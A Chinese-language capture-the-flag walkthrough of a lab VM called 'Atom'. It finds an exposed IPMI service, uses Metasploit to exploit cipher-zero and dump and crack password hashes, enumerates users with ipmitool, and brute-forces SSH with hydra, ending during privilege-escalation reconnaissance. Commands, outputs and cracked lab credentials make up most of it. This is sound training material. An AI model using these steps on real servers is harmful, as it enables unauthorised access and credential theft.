Atom

信息收集

IP=192.168.0.203
nmap $IP

22/tcp open  ssh

发现只有一个 22，然后 nmap $IP -p- 依然如此。这总不能让我爆破 ssh 吧。

再试试 udp，默认的 nmap -sU $IP 的速度太慢，加上 -T5 试试。

nmap -sU $IP -T5

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-13 01:06 EDT
Warning: 192.168.0.203 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.0.203
Host is up (0.0012s latency).
Not shown: 980 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
623/udp   open   asf-rmcp
687/udp   closed asipregistry
789/udp   closed unknown
1050/udp  closed cma
2343/udp  closed nati-logos
5010/udp  closed telelpathstart
16939/udp closed unknown
19120/udp closed unknown
19995/udp closed unknown
20522/udp closed unknown
21742/udp closed unknown
23531/udp closed unknown
32773/udp closed sometimes-rpc10
33281/udp closed unknown
33744/udp closed unknown
47981/udp closed unknown
49360/udp closed unknown
52503/udp closed unknown
55043/udp closed unknown
57409/udp closed unknown
MAC Address: 08:00:27:56:C9:74 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 27.39 seconds

看见一堆不熟悉的端口，这几个有 service 的先查查看。 查 623 的时候，直接找到了 hacktricks 的文章

先利用 Kimi 总结下网页：

全文摘要
本文详细介绍了智能平台管理接口（IPMI）的基本概念、用途、组件和潜在的安全漏洞。IPMI 允许系统管理员在操作系统关闭或无响应的情况下远程管理和监控计算机系统。文章还探讨了 IPMI 的漏洞，如认证绕过、密码哈希泄露、默认配置漏洞、以及如何通过 BMC 访问主机系统和引入后门。最后，提供了相关资源链接和 Shodan 搜索方法。

关键段落
IPMI 概述: IPMI 是一种标准化的远程管理和监控计算机系统的方法，独立于操作系统或电源状态，用于预操作系统引导配置、关机管理、系统故障恢复等。
IPMI 组件: 包括基板管理控制器（BMC）、通信总线和接口、IPMI 内存等。
IPMI 漏洞: 包括 IPMI 2.0 的认证绕过、远程密码哈希泄露、匿名认证漏洞、Supermicro IPMI 的明文密码存储和 UPnP 漏洞。
IPMI 认证绕过: 通过 Metasploit 和 ipmitool 工具演示了如何利用 IPMI 2.0 的 Cipher 0 漏洞进行认证绕过和密码修改。
IPMI 匿名认证: 许多 BMC 的默认配置允许匿名访问，可以重置命名用户账户的密码。
Supermicro IPMI 明文密码: Supermicro 的 BMC 存储明文密码，存在安全风险。
访问主机: 通过 BMC 的 KVM 功能或串口重定向访问主机系统。
引入后门: 在被入侵的主机上使用 ipmitool 工具在 BMC 中创建后门用户账户，绕过身份验证。
Shodan 搜索: 使用 Shodan 搜索 IPMI 相关设备的方法。

渗透

根据文章，先启动下 msf，然后搜索下 623 端口。

msfconsole

use auxiliary/scanner/ipmi/ipmi_cipher_zero

show options

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RHOSTS 192.168.0.203
RHOSTS => 192.168.0.203
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run

[*] Sending IPMI requests to 192.168.0.203->192.168.0.203 (1 hosts)
[+] 192.168.0.203:623 - IPMI - VULNERABLE: Accepted a session open request for cipher zero
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

看这意思貌似是存在这个漏洞， 看来方向是对了。
继续翻文章。有一个 Remote Password Hash Retrieval 的方法，试试：

use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS 192.168.0.203
RHOSTS => 192.168.0.203
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 192.168.0.203:623 - IPMI - Hash found: admin:3f8427d3020200001c33a02552bc0c09a48bdcb866fb72dc1958c33f208f91289668e509c8561c14a123456789abcdefa123456789abcdef140561646d696e:18016043968f107618d8a7d2f1d3f4cbf54b94fb
[+] 192.168.0.203:623 - IPMI - Hash for user 'admin' matches password 'cukorborso'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

这意思是，admin 的密码是 cukorborso。
先登录下 ssh 试试：

ssh admin@$IP

密码不对，看来没这么简单。

可以用ipmitool 来 list 用户

apt-get install ipmitool
ipmitool -I lanplus -C 0 -H $IP -U admin -P cukorborso user list
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      Unknown (0x00)
2   admin            true    false      true       ADMINISTRATOR
3   analiese         true    false      true       USER
4   briella          true    false      true       USER
5   richardson       true    false      true       USER
6   carsten          true    false      true       USER
7   sibylle          true    false      true       USER
8   wai-ching        true    false      true       USER
9   jerrilee         true    false      true       USER
10  glynn            true    false      true       USER
11  asia             true    false      true       USER
12  zaylen           true    false      true       USER
13  fabien           true    false      true       USER
14  merola           true    false      true       USER
15  jem              true    false      true       USER
16  riyaz            true    false      true       USER
17  laten            true    false      true       USER
18  cati             true    false      true       USER
19  rozalia          true    false      true       USER
20  palmer           true    false      true       USER
21  onida            true    false      true       USER
22  terra            true    false      true       USER
23  ranga            true    false      true       USER
24  harrie           true    false      true       USER
25  pauly            true    false      true       USER
26  els              true    false      true       USER
27  bqb              true    false      true       USER
28  karlotte         true    false      true       USER
29  zali             true    false      true       USER
30  ende             true    false      true       USER
31  stacey           true    false      true       USER
32  shirin           true    false      true       USER
33  kaki             true    false      true       USER
34  saman            true    false      true       USER
35  kalie            true    false      true       USER
36  deshawn          true    false      true       USER
37  mayeul           true    false      true       USER
38                   true    false      false      Unknown (0x00)
39                   true    false      false      Unknown (0x00)
40                   true    false      false      Unknown (0x00)
41                   true    false      false      Unknown (0x00)
42                   true    false      false      Unknown (0x00)
43                   true    false      false      Unknown (0x00)
44                   true    false      false      Unknown (0x00)
45                   true    false      false      Unknown (0x00)
46                   true    false      false      Unknown (0x00)
47                   true    false      false      Unknown (0x00)
48                   true    false      false      Unknown (0x00)
49                   true    false      false      Unknown (0x00)
50                   true    false      false      Unknown (0x00)
51                   true    false      false      Unknown (0x00)
52                   true    false      false      Unknown (0x00)
53                   true    false      false      Unknown (0x00)
54                   true    false      false      Unknown (0x00)
55                   true    false      false      Unknown (0x00)
56                   true    false      false      Unknown (0x00)
57                   true    false      false      Unknown (0x00)
58                   true    false      false      Unknown (0x00)
59                   true    false      false      Unknown (0x00)
60                   true    false      false      Unknown (0x00)
61                   true    false      false      Unknown (0x00)
62                   true    false      false      Unknown (0x00)
63                   true    false      false      Unknown (0x00)

搞了一堆用户名下来。
那刚才那个密码可以 retrive 出来，现在有了用户名列表，可以再试试了。

ipmitool -I lanplus -C 0 -H $IP -U admin -P cukorborso user list | awk '{print $2}' | uniq -u > /root/Downloads/atom/user.txt

# 回到 msf

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set USER_FILE  /root/Downloads/atom/user.txt
USER_FILE => /root/Downloads/atom/user.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

rockyou 似乎是太大了，run 的时候就卡主不动，也不知道是我虚机配置的硬件配置太低？换个小点的吧。

set PASS_FILE /usr/share/wordlists/seclists/Passwords/Common-Credentials/100k-most-used-passwords-NCSC.txt
run
[+] 192.168.0.203:623 - IPMI - Hash found: admin:ccd7c3b402260000f326453deb9a92068ed2abb938e22bc0c24740f9f27f77ac04d368629254211da123456789abcdefa123456789abcdef140561646d696e:1d02ce7d440aa0ffd5df9731fdbe7d7ecb07cd43
[+] 192.168.0.203:623 - IPMI - Hash found: analiese:57a85d2a8426000014244626ae6d772c0b69e02ce9258d04f3d80a6d3c4beabd989ce4c56242e890a123456789abcdefa123456789abcdef1408616e616c69657365:b4a3978fac2f1f21e55c501166de515c922893f6
[+] 192.168.0.203:623 - IPMI - Hash for user 'analiese' matches password 'honda'
[+] 192.168.0.203:623 - IPMI - Hash found: briella:07a5a2b0062700008fd3680d58b2a12ef6fc7eb379360967b01b8b749fe56253711a0070ade11d8ea123456789abcdefa123456789abcdef1407627269656c6c61:024656045dcae6925f355bed14bcd0b900579332
[+] 192.168.0.203:623 - IPMI - Hash for user 'briella' matches password 'jesus06'
[+] 192.168.0.203:623 - IPMI - Hash found: richardson:8650304b8827000002a530b0bd8a1915e7821a118ccaa19565c68e9cc4147aec123841d694874e51a123456789abcdefa123456789abcdef140a72696368617264736f6e:a09a4383d82b9e09e8143cb5ce97aae075fe6a16
[+] 192.168.0.203:623 - IPMI - Hash found: carsten:913f599c0a2800006998c8a035045703035cf9b667286f22cbbdd0dd6f68facc78126ae5f09dd26da123456789abcdefa123456789abcdef14076361727374656e:64df708b8d673a67f8a88aabdf795eea2d4dda5a
[+] 192.168.0.203:623 - IPMI - Hash for user 'carsten' matches password '2468'
[+] 192.168.0.203:623 - IPMI - Hash found: sibylle:6cbafcb18c2800000160ca739c8a76b87f4602dd19908f2f93a651e01428e9326926c0ed12b95bb9a123456789abcdefa123456789abcdef1407736962796c6c65:211e362e0b5fd44e77d485348947e5e8406e3bc4
[+] 192.168.0.203:623 - IPMI - Hash for user 'sibylle' matches password 'me4life'
[+] 192.168.0.203:623 - IPMI - Hash found: wai-ching:11953d550e290000eb71423a94ed0e453015f01523aee2c2d471cb1fe03aa6ba43163f16935f22c0a123456789abcdefa123456789abcdef14097761692d6368696e67:ffe805df6925c43ef3a31a5b9ea043de1938939e
[+] 192.168.0.203:623 - IPMI - Hash for user 'wai-ching' matches password '10101979'
[+] 192.168.0.203:623 - IPMI - Hash found: jerrilee:2f7c77569029000004fc738a7cddc9f3b9e411142345bc8b624134847d20664a53b265bf68e7cf41a123456789abcdefa123456789abcdef14086a657272696c6565:2f80c5c2990a2b09c25bd8fb7631f7135d719aeb
[+] 192.168.0.203:623 - IPMI - Hash for user 'jerrilee' matches password 'number17'
[+] 192.168.0.203:623 - IPMI - Hash found: glynn:1ada5d8e122a0000861bafb275bdf38c080d7c66011a1df26fb6706764692fb0c9752c00e149a61da123456789abcdefa123456789abcdef1405676c796e6e:17ce5550b99e381d1db8d7a99c331a42b84ff072
[+] 192.168.0.203:623 - IPMI - Hash for user 'glynn' matches password 'evan'
[+] 192.168.0.203:623 - IPMI - Hash found: asia:26d56284942a0000f9078fbbce4283408b8a300abed89fcf6036594ebbf776309c9e350a9f26f268a123456789abcdefa123456789abcdef140461736961:3511bf3fa7f3b8a68a4484ceb1397398bf966575
[+] 192.168.0.203:623 - IPMI - Hash found: zaylen:28fcc6c2162b000031e0b983b5cccfe2470659d8fc562e1c10528cfb6b61d1d4d9184774112ff100a123456789abcdefa123456789abcdef14067a61796c656e:c966bc26ad9ef141fc1a389a7ea03ae0fab37fee
[+] 192.168.0.203:623 - IPMI - Hash for user 'zaylen' matches password '120691'
[+] 192.168.0.203:623 - IPMI - Hash found: fabien:2a20d96e982b000077d4e960098434e7ae7d063c6149a14914276487dc7a212d044350b39a7a8082a123456789abcdefa123456789abcdef140666616269656e:ce73679b198eb4ffa47623fd239f70cf57a4a47c
[+] 192.168.0.203:623 - IPMI - Hash found: merola:5ae358cd022c00006bb6fe7ed45553d4b774c77a974cdad9704567978be534cb613090e3b9bed660a123456789abcdefa123456789abcdef14066d65726f6c61:1954191d567c7e2449b64008dc31d3fa2f68852f
[+] 192.168.0.203:623 - IPMI - Hash for user 'merola' matches password 'mackenzie2'
[+] 192.168.0.203:623 - IPMI - Hash found: jem:0ab87353842c0000ebe049b97a16b2e1cae7e2625e7508f5c9c65ff19aeee54954763d54ef0c9d4ba123456789abcdefa123456789abcdef14036a656d:1ff137bb7ad434f14f8f226aba4be31ab202926a
[+] 192.168.0.203:623 - IPMI - Hash found: riyaz:8ad48fb4062d000014664e722a2bae088952000965c8f179dca28754ef1499cd93c2aa4cc932778da123456789abcdefa123456789abcdef1405726979617a:890f85a2b367aacad3c84ef858454e1cfc703d04
[+] 192.168.0.203:623 - IPMI - Hash found: laten:d48e48ca882d0000d5840f7e641ae1c8a57d96279f9e7cd8dc59259282cf6501adbd10532e275d93a123456789abcdefa123456789abcdef14056c6174656e:beaefde1f2097d67e5f460000ffbde535ec63fbf
[+] 192.168.0.203:623 - IPMI - Hash for user 'laten' matches password 'trick1'
[+] 192.168.0.203:623 - IPMI - Hash found: cati:198031060a2e00000864be87b6149fb3d658a736c12dc98f8f0725a055ca357bea5a017ecf0d7ecca123456789abcdefa123456789abcdef140463617469:e237734470ca4ddb2b4c540a4bead30d14627d02
[+] 192.168.0.203:623 - IPMI - Hash for user 'cati' matches password '122987'
[+] 192.168.0.203:623 - IPMI - Hash found: rozalia:788f77af8c2e00000323e0c846c4c2ad6f996c30a8e481a255b3b02108bb8ca0db0b834281c2b630a123456789abcdefa123456789abcdef1407726f7a616c6961:92ac882f9716e6bacf8e36f5cb91fbc7bb19edb3
[+] 192.168.0.203:623 - IPMI - Hash for user 'rozalia' matches password 'batman!'
[+] 192.168.0.203:623 - IPMI - Hash found: palmer:2d3d8bc50e2f00004911dca02993f6842996899985e5b8ad7881602ec91982b13be3d5fce6cda3b0a123456789abcdefa123456789abcdef140670616c6d6572:e2a38bc638696c21b65afb9da93aa1774db02669
[+] 192.168.0.203:623 - IPMI - Hash for user 'palmer' matches password 'phones'
[+] 192.168.0.203:623 - IPMI - Hash found: onida:2dd4da57902f00008f98b3a16717c6941d5d12d9dcbe051d45498c84ba03e90309084587dbf0b26ba123456789abcdefa123456789abcdef14056f6e696461:1f39f330b72cf4d1591348d4c7550b6a34392692
[+] 192.168.0.203:623 - IPMI - Hash for user 'onida' matches password 'jiggaman'
[+] 192.168.0.203:623 - IPMI - Hash found: terra:d6f78440123000009f3ad3bd90041597b78b7536984aa80223be9896d75891203e5d55ac9a852602a123456789abcdefa123456789abcdef14057465727261:5381d20a537b680dd8e0a39a985dde81a2e62777
[+] 192.168.0.203:623 - IPMI - Hash found: ranga:1d814b219430000074add6f03e29aa33d594d76c8bf0ceb28ccbb8a1f7ceb270931759730c4f62ffa123456789abcdefa123456789abcdef140572616e6761:ec9a71bf2177f4546af2f8ac049c59a6c5010fc1
[+] 192.168.0.203:623 - IPMI - Hash for user 'ranga' matches password 'jaffa1'
[+] 192.168.0.203:623 - IPMI - Hash found: harrie:2c63c07316310000609a37fa5d5f27bbb7118f0a70d46483f4eb1093020ec0bebb508303000344f5a123456789abcdefa123456789abcdef1406686172726965:8b622aab7968f1ae788bb7b8958af40fee012fc2
[+] 192.168.0.203:623 - IPMI - Hash found: pauly:c364c7d582310000d67585c37bf528bc60944e140ef651edef9762c7f1c0f839addfa1a28899bfbea123456789abcdefa123456789abcdef14057061756c79:84159c2c964e37b46c10ea85ec1204971259aa6b
[+] 192.168.0.203:623 - IPMI - Hash for user 'pauly' matches password '515253'
[+] 192.168.0.203:623 - IPMI - Hash found: els:dbd238fe04320000726198f30d91bf8155802f4c047d1af1a248a4484222dd9058f49cabff986f13a123456789abcdefa123456789abcdef1403656c73:76818e5972dd145203c6d47747a7d16cfe026310
[+] 192.168.0.203:623 - IPMI - Hash found: bqb:5b1bcdfb86320000f5daca12fdbde5f88c6a9aad480cd406c76a483aef1b32f2dd75e36ffefd253fa123456789abcdefa123456789abcdef1403627162:b56f8ff69feef06e399c3130e196b1fb4e5390d7
[+] 192.168.0.203:623 - IPMI - Hash for user 'bqb' matches password '290992'
[+] 192.168.0.203:623 - IPMI - Hash found: karlotte:6ad6c66218330000be3bd14f58b4218264330713d49b1d7600f6c71b128e3586395d9b189e5b565ba123456789abcdefa123456789abcdef14086b61726c6f747465:43c46355ab0e1361119b3252556951dcee31b330
[+] 192.168.0.203:623 - IPMI - Hash for user 'karlotte' matches password 'emeralds'
[+] 192.168.0.203:623 - IPMI - Hash found: zali:d6a71fb688330000274baee27e36a5f71fd7423f1cdf5f60e56f7e45ec384c0d0146243835d58e1ea123456789abcdefa123456789abcdef14047a616c69:c44d488489ef9925daea66ddc719fc53134173a6
[+] 192.168.0.203:623 - IPMI - Hash found: ende:544c3f200a34000009a91a843ed7dbd6745328726632fff3213980c55972d06130850ca71a46f7b5a123456789abcdefa123456789abcdef1404656e6465:810e7815e298f0073a025bc3e94680f79a1eb82f
[+] 192.168.0.203:623 - IPMI - Hash for user 'ende' matches password 'tripod'
[+] 192.168.0.203:623 - IPMI - Hash found: stacey:1955c8ac8c34000085b5503a78038d22f3e37faa61ca88e2df4b46aa56412befc656478212c36c88a123456789abcdefa123456789abcdef1406737461636579:18c44057617865782673264f4aca5ff57d064d4e
[+] 192.168.0.203:623 - IPMI - Hash for user 'stacey' matches password 'castillo1'
[+] 192.168.0.203:623 - IPMI - Hash found: shirin:e38523210e350000efff27f57946f460403251226f040855475bfdc8c560e69beb89f738d16e4de5a123456789abcdefa123456789abcdef140673686972696e:4879bea4c955884f8c20b83f25b05499930f9492
[+] 192.168.0.203:623 - IPMI - Hash found: kaki:418a507c90350000acb4896f81b3aaabdf908d5d93d4e08323904a579c724defdb782b2b6541637da123456789abcdefa123456789abcdef14046b616b69:4bc2aecac0fb53144105cac5a718473fb529f029
[+] 192.168.0.203:623 - IPMI - Hash for user 'kaki' matches password 'numberone'
[+] 192.168.0.203:623 - IPMI - Hash found: saman:d7954f6012360000891b05491a9d8f46ab0b4c0d445b82626af07209f5bf1bd48ba1dcf79c28b238a123456789abcdefa123456789abcdef140573616d616e:bdc3d00c1bd55f072aca4b915add0f1bd7e4d7a9
[+] 192.168.0.203:623 - IPMI - Hash found: kalie:3c2b79d79436000048703396e0c09ef177fd5eee965451d647033a89a72decb1ffa0cd2182d597a2a123456789abcdefa123456789abcdef14056b616c6965:ecd5ad12c010e26a594adfe9cdde81663b48ec9c
[+] 192.168.0.203:623 - IPMI - Hash found: deshawn:b0268b760237000096a5cfffc06cc4886cc85b5425917296c340a6926ce00c4bca87ca3b43882230a123456789abcdefa123456789abcdef14076465736861776e:b91fe67c8bb1f4b840c59fa8c6167927f171ada2
[+] 192.168.0.203:623 - IPMI - Hash for user 'deshawn' matches password 'milo123'
[+] 192.168.0.203:623 - IPMI - Hash found: mayeul:ed16a25b843700001a13bbc0612a719438145c4c783b9ac502ef6c03dfc2d2c89d00622587fd2541a123456789abcdefa123456789abcdef14066d617965756c:241d09ce244f4b80a82148f42fefc626b209957e
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

把这段文本保存到 tmp.txt 中，然后提取 user 和 pass，拼成 user:pass 格式，然后用 hydra 来爆破 ssh。

cat tmp.txt | grep -E 'Hash for user|matches password' | awk '{printf "%s:%s\n", $9,$12}' | sed  "s/'//g" > /root/Downloads/atom/user_pass.txt
hydra  -C /root/Downloads/atom/user_pass.txt ssh://$IP

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-13 03:21:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 22 login tries, ~2 tries per task
[DATA] attacking ssh://192.168.0.203:22/
[22][ssh] host: 192.168.0.203   login: onida   password: jiggaman
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-13 03:21:23

找到了一个密码，onida:jiggaman，试试登录：

ssh onida@$IP

onida@atom:~$ id
uid=1000(onida) gid=1000(onida) groups=1000(onida),100(users)

提权

sudo -l
-bash: sudo: command not found
# sudo 没有， 接下来就是一顿翻找。

onida@atom:~$ ps -aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.4 102008 12128 ?        Ss   06:38   0:01 /sbin/init
root           2  0.0  0.0      0     0 ?        S    06:38   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   06:38   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   06:38   0:00 [rcu_par_gp]
root           5  0.0  0.0      0     0 ?        I<   06:38   0:00 [slub_flushwq]
root           6  0.0  0.0      0     0 ?        I<   06:38   0:00 [netns]
root          10  0.0  0.0      0     0 ?        I<   06:38   0:00 [mm_percpu_wq]
root          11  0.0  0.0      0     0 ?        I    06:38   0:00 [rcu_tasks_kthread]
root          12  0.0  0.0      0     0 ?        I    06:38   0:00 [rcu_tasks_rude_kthread]
root          13  0.0  0.0      0     0 ?        I    06:38   0:00 [rcu_tasks_trace_kthread]
root          14  0.0  0.0      0     0 ?        S    06:38   0:00 [ksoftirqd/0]
root          15  0.0  0.0      0     0 ?        I    06:38   0:00 [rcu_preempt]
root          16  0.0  0.0      0     0 ?        S    06:38   0:00 [migration/0]
root          18  0.0  0.0      0     0 ?        S    06:38   0:00 [cpuhp/0]
root          20  0.0  0.0      0     0 ?        S    06:38   0:00 [kdevtmpfs]
root          21  0.0  0.0      0     0 ?        I<   06:38   0:00 [inet_frag_wq]
root          22  0.0  0.0      0     0 ?        S    06:38   0:00 [kauditd]
root          23  0.0  0.0      0     0 ?        S    06:38   0:00 [khungtaskd]
root          24  0.0  0.0      0     0 ?        S    06:38   0:00 [oom_reaper]
root          27  0.0  0.0      0     0 ?        I<   06:38   0:00 [writeback]
root          28  0.0  0.0      0     0 ?        S    06:38   0:01 [kcompactd0]
root          29  0.0  0.0      0     0 ?        SN   06:38   0:00 [ksmd]
root          30  0.0  0.0      0     0 ?        SN   06:38   0:00 [khugepaged]
root          31  0.0  0.0      0     0 ?        I<   06:38   0:00 [kintegrityd]
root          32  0.0  0.0      0     0 ?        I<   06:38   0:00 [kblockd]
root          33  0.0  0.0      0     0 ?        I<   06:38   0:00 [blkcg_punt_bio]
root          34  0.0  0.0      0     0 ?        I<   06:38   0:00 [tpm_dev_wq]
root          35  0.0  0.0      0     0 ?        I<   06:38   0:00 [edac-poller]
root          36  0.0  0.0      0     0 ?        I<   06:38   0:00 [devfreq_wq]
root          37  0.0  0.0      0     0 ?        I<   06:38   0:00 [kworker/0:1H-kblockd]
root          38  0.0  0.0      0     0 ?        S    06:38   0:00 [kswapd0]
root          44  0.0  0.0      0     0 ?        I<   06:38   0:00 [kthrotld]
root          46  0.0  0.0      0     0 ?        I<   06:38   0:00 [acpi_thermal_pm]
root          47  0.0  0.0      0     0 ?        I<   06:38   0:00 [mld]
root          48  0.0  0.0      0     0 ?        I<   06:38   0:00 [ipv6_addrconf]
root          53  0.0  0.0      0     0 ?        I<   06:38   0:00 [kstrp]
root          58  0.0  0.0      0     0 ?        I<   06:38   0:00 [zswap-shrink]
root          59  0.0  0.0      0     0 ?        I<   06:38   0:00 [kworker/u3:0]
root         128  0.0  0.0      0     0 ?        I<   06:38   0:00 [ata_sff]
root         129  0.0  0.0      0     0 ?        S    06:38   0:00 [scsi_eh_0]
root         130  0.0  0.0      0     0 ?        I<   06:38   0:00 [scsi_tmf_0]
root         131  0.0  0.0      0     0 ?        S    06:38   0:00 [scsi_eh_1]
root         132  0.0  0.0      0     0 ?        S    06:38   0:00 [scsi_eh_2]
root         133  0.0  0.0      0     0 ?        I<   06:38   0:00 [scsi_tmf_2]
root         134  0.0  0.0      0     0 ?        I<   06:38   0:00 [scsi_tmf_1]
root         143  0.0  0.0      0     0 ?        I<   06:38   0:00 [kworker/0:2H-kblockd]
root         174  0.0  0.0      0     0 ?        S    06:38   0:00 [jbd2/sda1-8]
root         175  0.0  0.0      0     0 ?        I<   06:38   0:00 [ext4-rsv-conver]
root         215  0.0  0.6  49496 18204 ?        Ss   06:38   0:00 /lib/systemd/systemd-journald
root         237  0.0  0.2  26532  6552 ?        Ss   06:38   0:00 /lib/systemd/systemd-udevd
systemd+     252  0.0  0.2  90056  6724 ?        Ssl  06:38   0:00 /lib/systemd/systemd-timesyncd
root         302  0.0  0.0   6608  2692 ?        Ss   06:38   0:00 /usr/sbin/cron -f
message+     303  0.0  0.1   9448  5108 ?        Ss   06:38   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --s
polkitd      306  0.0  0.2 234744  7768 ?        Ssl  06:38   0:00 /usr/lib/polkit-1/polkitd --no-debug
root         307  0.0  0.2  25368  8168 ?        Ss   06:38   0:00 /lib/systemd/systemd-logind
root         312  0.0  0.7 258636 21980 ?        Ssl  06:38   0:07 /usr/sbin/NetworkManager --no-daemon
root         313  0.0  0.1  16520  5884 ?        Ss   06:38   0:00 /sbin/wpa_supplicant -u -s -O DIR=/run/wpa_supplicant GROUP=netdev
root         333  0.0  0.3 317320 11920 ?        Ssl  06:38   0:00 /usr/sbin/ModemManager
root         354  0.0  0.0   5872  1024 tty1     Ss+  06:38   0:00 /sbin/agetty -o -p -- \u --noclear - linux
root         364  0.0  0.0      0     0 ?        I<   06:38   0:00 [cryptd]
root         404  0.1  1.6 1204860 49744 ?       Ssl  06:38   0:14 /usr/bin/containerd
root         405  0.0  0.3  15412  9328 ?        Ss   06:38   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         409  0.0  0.0      0     0 ?        S    06:38   0:00 [irq/18-vmwgfx]
root         416  0.0  0.7 205740 21836 ?        Ss   06:38   0:01 /usr/sbin/apache2 -k start
www-data     489  0.0  0.3 206328 11104 ?        S    06:38   0:00 /usr/sbin/apache2 -k start
www-data     491  0.0  0.3 206328 11104 ?        S    06:38   0:00 /usr/sbin/apache2 -k start
www-data     497  0.0  0.3 206328 11104 ?        S    06:38   0:00 /usr/sbin/apache2 -k start
www-data     498  0.0  0.3 206328 11104 ?        S    06:38   0:00 /usr/sbin/apache2 -k start
www-data     499  0.0  0.3 206328 11104 ?        S    06:38   0:00 /usr/sbin/apache2 -k start
root         582  0.0  2.7 1385340 82348 ?       Ssl  06:38   0:02 /usr/sbin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root         806  0.0  1.6 1053320 49224 ?       Ssl  06:38   0:01 /usr/bin/docker start -a f2f2341a4a7b
root         832  0.0  0.4 1156220 15008 ?       Sl   06:38   0:00 /usr/sbin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 623 -contai
root         845  0.0  0.4 1156220 12128 ?       Sl   06:38   0:00 /usr/sbin/docker-proxy -proto udp -host-ip 0.0.0.0 -host-port 623 -contai
root         858  0.1  0.7 1332256 23568 ?       Sl   06:38   0:12 /usr/bin/containerd-shim-runc-v2 -namespace moby -id f2f2341a4a7b3ee958a2
root         879  0.0  0.0  11756  2556 pts/0    Ss+  06:38   0:00 /bin/bash /usr/bin/start.sh
root         909  0.0  0.1  28056  3188 pts/0    S+   06:38   0:01 ipmi_sim -c /lan.conf -f /sim.emu
root        1201  0.0  0.0      0     0 ?        I    07:58   0:00 [kworker/u2:1-events_unbound]
root        1256  0.2  0.0      0     0 ?        I    08:09   0:09 [kworker/0:3-events]
root        1419  0.0  0.0      0     0 ?        I    09:21   0:00 [kworker/u2:2-events_unbound]
root        1445  0.0  0.0      0     0 ?        I    09:21   0:00 [kworker/0:2-ata_sff]
root        1446  0.0  0.3  17808 10876 ?        Ss   09:21   0:00 sshd: onida [priv]
onida       1449  0.0  0.3  18880 10540 ?        Ss   09:21   0:00 /lib/systemd/systemd --user
onida       1450  0.0  0.1 103228  3112 ?        S    09:21   0:00 (sd-pam)
onida       1460  0.0  0.2  17968  6852 ?        S    09:21   0:00 sshd: onida@pts/0
onida       1461  0.0  0.1   9604  5856 pts/0    Ss+  09:21   0:00 -bash
root        1482  0.0  0.0      0     0 ?        I    09:26   0:00 [kworker/0:0-ata_sff]
root        1485  0.0  0.0      0     0 ?        I    09:27   0:00 [kworker/u2:0-flush-8:0]
root        1486  0.9  0.3  17800 11052 ?        Ss   09:27   0:00 sshd: onida [priv]
onida       1492  0.1  0.2  18060  6856 ?        S    09:27   0:00 sshd: onida@pts/1
onida       1493  0.4  0.1   8232  5020 pts/1    Ss   09:27   0:00 -bash
onida       1496  100  0.1  12252  5316 pts/1    R+   09:27   0:00 ps -aux

docker 是启动 623 的，应该和 ipmi 有关。
看到 /bin/bash /usr/bin/start.sh，看看这个文件：

cat /usr/bin/start.sh
cat: /usr/bin/start.sh: No such file or directory

文件竟然不存在。这个目录正常也没有写入权限 drwxr-xr-x 2 root root 28672 May 27 08:51 bin.
这条路没通。

看见有 apache2 看一眼配置。

cat /etc/apache2/sites-enabled/000-default.conf

<VirtualHost 127.0.0.1:80>
	# The ServerName directive sets the request scheme, hostname and port that
	# the server uses to identify itself. This is used when creating
	# redirection URLs. In the context of virtual hosts, the ServerName
	# specifies what hostname must appear in the request's Host: header to
	# match this virtual host. For the default virtual host (this file) this
	# value is not decisive as it is used as a last resort host regardless.
	# However, you must set it for any further virtual host explicitly.
	ServerName atom.hmv

	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html

	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn

	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

curl localhost
# 有一个页面,去看看

cd /var/www/html
ls -al

total 172
drwxr-xr-x 6 www-data www-data   4096 May 27 15:21 .
drwxr-xr-x 3 root     root       4096 May 25 22:19 ..
-rwxr-xr-x 1 www-data www-data 114688 May 27 15:21 atom-2400-database.db
drwxr-xr-x 2 www-data www-data   4096 Dec 31  2400 css
drwxr-xr-x 4 www-data www-data   4096 Dec 31  2400 img
-rw-r--r-- 1 www-data www-data  11767 Dec 31  2400 index.php
drwxr-xr-x 2 www-data www-data   4096 Dec 31  2400 js
-rw-r--r-- 1 www-data www-data   6262 Dec 31  2400 login.php
